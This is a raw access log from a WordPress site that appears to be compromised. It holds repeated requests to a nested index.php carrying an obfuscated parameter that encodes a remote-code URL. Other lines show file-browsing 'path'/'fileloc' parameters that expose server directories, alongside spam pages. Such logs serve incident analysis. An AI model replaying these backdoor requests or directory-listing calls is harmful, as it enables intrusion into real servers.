185.216.113.70 - - [01/May/2026:11:50:40 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393034302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353434302q6336383435333665663939616161366565316136636436633134663833653530222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
185.191.171.7 - - [01/May/2026:11:52:40 +0300] "GET /atomic-wallet-a-user-friendly-approach-to-crypto-management/ HTTP/1.1" 200 10350 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.78.1 - - [01/May/2026:11:52:43 +0300] "GET /shop/speeding/impede463133217677.html HTTP/1.1" 200 30320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [01/May/2026:11:52:57 +0300] "GET /shop/unmotorized/sleeplessness972446948774.html HTTP/1.1" 200 31735 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:53:01 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-pt_PT.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 9647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:51:02 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393036322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353436322q3462373536313333373635633036323962316265646637623337353836643762222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:53:07 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal%2Faudio.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal HTTP/2" 200 2846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:53:13 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_twisted.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.3 - - [01/May/2026:11:53:20 +0300] "GET /?detail/689361697 HTTP/1.1" 200 28383 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:51:24 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393038342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353438342q6262643964313534373937386637643335666335383533333038303538343065222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
14.183.20.177 - - [01/May/2026:11:53:27 +0300] "GET /11419-2/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-core-tools HTTP/1.1" 200 3653 "https://miroglu.net/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
66.249.73.162 - - [01/May/2026:11:53:31 +0300] "GET /?prizes/129404626 HTTP/1.1" 200 28591 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:51:46 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393130362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353530362q3139636632363437643137313234353461373265376564323164646331633638222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [01/May/2026:11:53:45 +0300] "GET /shop/closepacked/calumba692999126361.html HTTP/1.1" 200 28956 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:53:49 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2Ftext.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/2" 200 2845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:11:53:57 +0300] "GET /?prizes/123307343 HTTP/1.1" 200 29933 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:52:08 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393132382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353532382q6533333766666335393061313532666134363962326666323063366635303732222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.2 - - [01/May/2026:11:54:23 +0300] "GET /shop/supererogatory/chrysididae881136915335.html HTTP/1.1" 200 29869 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:52:30 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393135302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353535302q6338616336653930363163323363333263313336353733656134613962656133222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
47.82.9.85 - - [01/May/2026:11:54:31 +0300] "GET /dexscreener-a-game-changer-for-decentralized-exchange-analysis/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/xf75b47 HTTP/1.1" 200 3706 "https://miroglu.net/" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
47.82.10.91 - - [01/May/2026:11:54:32 +0300] "GET /dexscreener-a-game-changer-for-decentralized-exchange-analysis/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/js HTTP/1.1" 200 7094 "https://miroglu.net/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
66.249.78.2 - - [01/May/2026:11:54:34 +0300] "GET /?detail/10881665 HTTP/1.1" 200 28262 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.240.181 - - [01/May/2026:11:54:42 +0300] "GET /detail/497249620 HTTP/2" 200 8242 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
85.208.96.209 - - [01/May/2026:11:54:45 +0300] "GET /revolutionary-features-of-jupiter-swap-for-crypto-traders-3/2 HTTP/1.1" 200 10375 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:54:45 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 3688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:54:47 +0300] "GET /?detail/362699408 HTTP/1.1" 200 29950 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:54:51 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2Fdeabecebbbfce.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/2" 200 29260 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:52:52 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393137322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353537322q3765363765376238633333363766653337366434613665643632336634333137222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:11:54:59 +0300] "GET /?prizes/84110212 HTTP/1.1" 200 28848 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.240.185 - - [01/May/2026:11:55:09 +0300] "GET /detail/996796690 HTTP/2" 200 8259 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:11:53:14 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393139342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353539342q6566346232653236333761313230636163363761376636323165633138333038222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [01/May/2026:11:55:13 +0300] "GET /?prizes/128764838 HTTP/1.1" 200 29721 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:55:27 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_sad.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:55:29 +0300] "GET /?detail/590825544 HTTP/1.1" 200 28555 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:55:32 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2F404.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 3377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:53:36 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393231362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353631362q3965643861323031343930623566356666396433616639366334366266623437222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
51.195.183.52 - - [01/May/2026:11:55:37 +0300] "GET /detail/844137355 HTTP/2" 200 8245 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:11:55:43 +0300] "GET /?detail/247024814 HTTP/1.1" 200 28445 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:53:57 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393233372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353633372q3764336265646565313637313933616332626164613731623835353164626335222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:11:55:56 +0300] "GET /?prizes/81661646 HTTP/1.1" 200 28683 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.168.32 - - [01/May/2026:11:56:03 +0300] "GET /detail/398269042 HTTP/2" 200 8300 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:56:13 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_confused.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:54:19 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393235392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353635392q3661656465396535316331316331366633363037656261323733663631613861222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:56:29 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fwlw%2Fwp-watermark.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fwlw HTTP/2" 200 2852 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.242.141 - - [01/May/2026:11:56:30 +0300] "GET /detail/361458013 HTTP/2" 200 8251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:11:54:41 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393238312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353638312q3932646633623039313731306133386164303335666632303161383338353866222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [01/May/2026:11:56:42 +0300] "GET /?prizes/85363010 HTTP/1.1" 200 28768 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.197 - - [01/May/2026:11:56:48 +0300] "GET /2025/07/page/9/ HTTP/1.1" 200 10409 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
198.244.168.174 - - [01/May/2026:11:56:57 +0300] "GET /detail/992417131 HTTP/2" 200 8261 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.163 - - [01/May/2026:11:56:58 +0300] "GET /shop/decidua/spandogs11862810534.html HTTP/1.1" 200 29931 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [01/May/2026:11:55:03 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393330332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353730332q3238323538636332613431356135636261333637663666653866646331386563222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:57:11 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fimg HTTP/2" 200 5923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:57:11 +0300] "GET /?detail/929023053 HTTP/1.1" 200 28781 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:57:16 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_rolleyes.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.215.28 - - [01/May/2026:11:57:24 +0300] "GET /detail/982200826 HTTP/2" 200 8265 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.78.1 - - [01/May/2026:11:57:23 +0300] "GET /?detail/473129279 HTTP/1.1" 200 29475 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:55:25 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393332352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353732352q3037356632613765366663363565613234303866313737313030613937613931222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:11:57:34 +0300] "GET /?detail/713246499 HTTP/1.1" 200 28454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.209 - - [01/May/2026:11:57:46 +0300] "GET /discover-the-world-of-raydium-swap-and-exchange/2 HTTP/1.1" 200 10400 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.78.1 - - [01/May/2026:11:57:46 +0300] "GET /?prizes/153437323 HTTP/1.1" 200 28955 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:55:47 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393334372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353734372q6637306562356362306564623930333233643536613836646261306539363735222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
54.38.147.140 - - [01/May/2026:11:57:51 +0300] "GET /detail/973606614 HTTP/2" 200 8293 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:57:52 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 24923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:11:57:58 +0300] "GET /?detail/350649413 HTTP/1.1" 200 28147 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
